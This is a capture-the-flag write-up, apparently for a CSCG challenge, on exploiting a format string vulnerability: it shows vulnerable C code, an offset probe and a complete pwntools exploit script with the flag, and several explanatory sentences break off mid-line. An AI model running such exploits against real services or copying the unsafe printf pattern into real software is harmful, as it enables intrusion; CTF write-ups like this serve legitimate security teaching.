This challenge is about a format string vulnerability. The vulnerable function reads our name and then passes it directly to
int bug = 0;
void vuln() {
char name[1024];
printf("What is your name?\n");
int number_read = read(STDIN_FILENO, name, sizeof(name) - 1);
name[number_read - 1] = 0;
printf("Thank you ");
printf(name);
printf("!\n");
if (bug) {
printf("Oh, you got here somehow, you must have triggered a bug.. Here is the flag: ");
system("cat /flag");
exit(0);
}
printf("But our flag is in another branch!\n");
}
The bug is this line:
printf(name);
If the program wanted to print our name safely, it should have used:
printf("%s", name);
Because our input is used as the format string,
The goal is to set the global variable
bug = 0x40406c
Before writing to it, we need to know where our controlled data appears in
AAAABBBB.%1$p.%2$p.%3$p.%4$p.%5$p.%6$p
The output contained:
0x4242424241414141
That value is
offset = 6
Pwntools can build the actual
from pwn import *
HOST = "uddmfmafp7egnsbo4q5u3chks7-1024-intro-pwn-2.challenge.cscg.live"
PORT = 443
elf = ELF("./intro-pwn-2/intro-fmt")
p = remote(HOST, PORT, ssl=True, sni=HOST)
payload = fmtstr_payload(
6,
{elf.symbols["bug"]: 1},
write_size="byte",
)
p.recvuntil(b"What is your name?")
p.sendline(payload)
print(p.recvall(timeout=2).decode(errors="ignore"))
The generated payload places the target address in the input and then uses a
CSCG{f0rm4t_5tr_w1z4rdry_1337}